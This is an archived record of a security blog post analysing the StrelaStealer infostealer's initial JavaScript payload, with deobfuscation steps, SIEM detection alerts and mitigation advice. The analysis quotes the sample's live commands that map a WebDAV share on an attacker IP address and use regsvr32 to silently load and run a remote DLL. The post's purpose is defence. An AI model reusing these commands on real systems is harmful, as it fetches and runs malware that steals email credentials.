{
	"id": "d261f78e-b9fb-4191-92be-5437ac869763",
	"created_at": "2026-05-05T02:45:20.790013Z",
	"updated_at": "2026-05-05T02:46:36.687081Z",
	"deleted_at": null,
	"sha1_hash": "b3b18199e67989fa4b685b0447c30db000df8c36",
	"title": "Exploring Strela Stealer: Initial Payload Analysis and Insights",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2217967,
	"plain_text": "Exploring Strela Stealer: Initial Payload Analysis and Insights\r\nBy Anish Bogati\r\nArchived: 2026-05-05 02:08:01 UTC\r\nBackground\r\nSimilar to our previous analysis of the Loki malware family, we recently observed another emerging threat: StrelaStealer. Like Loki, this malware does not introduce any groundbreaking or novel techniques. However, the adversaries behind StrelaStealer demonstrated their ability to evade defenses by obfuscating the payload in ways that differ from typical malware techniques, including the insertion of long runs of junk text to complicate analysis.\r\nStrelaStealer, also known as Strela, is an infostealer malware that specifically targets login credentials from popular email clients. It has recently adopted obfuscation techniques such as string concatenation, character substitution, and anti-analysis tactics, making it more challenging for security tools to detect and analyze.\r\nStrelaStealer is primarily distributed through malspam campaigns containing zip files. The initial payload extracted from these files is typically a JavaScript (JS) file, serving as the entry point for infection.\r\nThe initial payload, a JavaScript (JS) file, is executed using wscript.exe, the default execution binary for such files on most Windows systems. During the file's execution, all the instructions are extracted from the JS file.\r\nguardsix Process Tree\r\nWhen the JS file is executed, it spawns a child process: powershell.exe. Subsequently, a Base64-encoded command is executed via PowerShell.\r\nhttps://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/\r\nPage 1 of 8\r\nPowershell process detail from the process tree\r\nEncoded Base64 command:\r\nThe above command translates into:\r\nFrom the decoded command, the execution flow can be traced as follows: the command first runs the timeout.exe binary, introducing a 1-second delay. Next, cmd.exe is invoked to run the Windows internal binary net.exe, which maps a network path to a WebDAV share. After that, regsvr32.exe is used to register and execute a DLL file remotely.\r\nThe commands from above are further broken down as follows:\r\ntimeout 1 :\r\nThis pauses the execution for 1 second, creating a brief delay in the execution flow.\r\ncmd /c net use \\\\94.159.113.79@8888\\davwwwroot\\ :\r\nThis uses the net use command to attempt to map or connect to a network share located at \\\\94.159.113.79@8888\\davwwwroot\\ .\r\ncmd /c regsvr32 /s \\\\94.159.113.79@8888\\davwwwroot\\134257976134.dll :\r\nThis executes regsvr32 to silently (using the /s switch) register or load a DLL file (134257976134.dll) hosted at the specified network share path.\r\nIn other samples, we have observed the use of rundll32.exe instead of regsvr32.exe to execute remote DLLs. Following the execution of the remote DLL, the main Strela payload is dropped and executed, which we will dive into in the upcoming blog.\r\nLooking Further into the JS File\r\nWhen the JS file is opened in Notepad++, it appears as shown below. A common characteristic of the recent Strela payloads we have analyzed is their unusually large file length.\r\nJS file contents\r\nAt first glance, the file contains lengthy object names with random properties assigned to seemingly arbitrary values. Following this is a function section and then a series of random string concatenations. The image below shows a reduced version of the initial payload for clarity.\r\nVariable value assignment\r\nThe adversaries have created long junk variables with random values to obfuscate and manipulate the code. These variables declare values that are later swapped with subsequent junk code. Due to the extensive code length, manual analysis becomes challenging. The payload is essentially structured in two parts: one part for variable declarations and a second part that uses these variables during execution to perform swapping and obfuscation.\r\nWe start by renaming the objects and properties to shorter identifiers, such as varx[propx], instead of the lengthy and complex names shown below.\r\nRenamed values\r\nAfter renaming the declared variables, we identified the characters used for substitution, as shown below:\r\nKey value pair from the payload\r\nOnce we identified the values, we simply renamed all other parts of the JS file accordingly.\r\nVariable renamed\r\nThe next step was to swap in the values and concatenate the resulting strings to extract the payload, as shown in the image below.\r\nExtracted data\r\nIn summary, the extracted text contains a Base64-encoded payload. When decoded, it reveals the PowerShell instructions shown above.\r\nDetection with guardsix SIEM\r\nThe techniques observed in the analyzed StrelaStealer sample are not unique, but rather commonly employed by various initial loaders and droppers to circumvent detection mechanisms. These methods illustrate a growing trend among malware to employ more sophisticated tactics to evade traditional defenses. As malware continues to evolve, recognizing these techniques has become increasingly important for timely identification and response.\r\nTo successfully detect these advanced behaviors, it's essential to implement strong auditing practices and ensure that relevant logs are generated. Proper logging and monitoring of key events provide invaluable insight into malicious activity, enabling faster identification of suspicious behaviors. Effective threat detection and hunting rely heavily on capturing data from specific log sources. Below is a list of crucial log sources needed to support a robust detection strategy:\r\n1. Windows\r\nProcess creation with command-line auditing should be enabled.\r\n2. Windows Sysmon\r\nTo get started, you can use our sysmon baseline configuration.\r\nSince many malware delivery techniques are similar, the alerts listed below have also been highlighted in our previous blogs. Ensure these alerts are enabled to effectively detect the initial infection chain.\r\nSuspicious File Execution Using Wscript or Cscript\r\nThe initial JS payload was executed using wscript.exe, making this alert effective for detecting the execution of scripting files via wscript.exe or cscript.exe.\r\nSuspicious PowerShell Parameter Substring Detected\r\nGiven that many of the attack steps utilized PowerShell and its cmdlets, this alert detects the use of suspicious PowerShell cmdlets commonly linked to malicious activities, such as executing Base64-encoded payloads or downloading remote files through PowerShell cmdlets.\r\nSystem Network Connections Discovery\r\nThe use of net.exe to map or connect to a remote network share enabled the adversaries to remotely access and execute files. This alert can be leveraged to detect similar events.\r\nRegsvr32 Anomalous Activity Detected\r\nThis alert helps detect the suspicious use of the regsvr32.exe binary, which, in the case of Strela, was employed to execute a remote file.\r\nRecommendation\r\nBlock Potentially Exploited File Types: Limit the execution of commonly exploited file types like .js, which threat actors frequently use for payload distribution. Exceptions should be carefully managed for trusted processes or authorized users to prevent disruption of legitimate activities.\r\nRegular User Training: Conduct routine training sessions for users to recognize and respond to social engineering and phishing attempts. Awareness and preparedness significantly reduce the likelihood of infection through these attack vectors.\r\nNetwork and Firewall Policies: Configure network policies and firewalls to block unauthorized connection attempts and outbound connections to untrusted remote hosts, reducing the risk of malware communication and data exfiltration.\r\nImplement a Secure Email Gateway: Ensure the deployment of this technology, which plays a critical role in reducing risks by blocking the majority of malspam emails before they reach users.\r\nRestrict Software Installation: Limit user privileges to prevent the installation and execution of unauthorized software, reducing exposure to potential infections.\r\nKeep Devices and Software Updated: Regularly update devices, browsers, and other applications to patch known vulnerabilities and defend against evolving threats.\r\nEDR Deployment: Employ advanced Endpoint Detection and Response (EDR) solutions to identify suspicious activity, particularly related to script execution and binary downloads. This enables early detection of malware behavior, especially when novel techniques like those observed in Strela are employed.\r\nMonitor Web Browsing Behavior: Track user browsing habits and restrict access to sites known for malicious or harmful content, preventing potential malware downloads.\r\nComprehensive Logging and Monitoring: Maintain thorough logging, asset visibility, and system monitoring. Regular audits should be conducted to detect anomalous activities. Robust log collection from all systems supports effective threat analysis and detection.\r\nLog Retention Policy: Establish a log retention period of at least six months to ensure sufficient data is available for incident investigation, enabling a comprehensive understanding of any attack's origin and impact.\r\nSource: https://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.logpoint.com/en/blog/strela-a-newcomer-in-stealer-family/"
	],
	"report_names": [
		"strela-a-newcomer-in-stealer-family"
	],
	"threat_actors": [],
	"ts_created_at": 1777949120,
	"ts_updated_at": 1777949196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b3b18199e67989fa4b685b0447c30db000df8c36.pdf",
		"text": "https://archive.orkl.eu/b3b18199e67989fa4b685b0447c30db000df8c36.txt",
		"img": "https://archive.orkl.eu/b3b18199e67989fa4b685b0447c30db000df8c36.jpg"
	}
}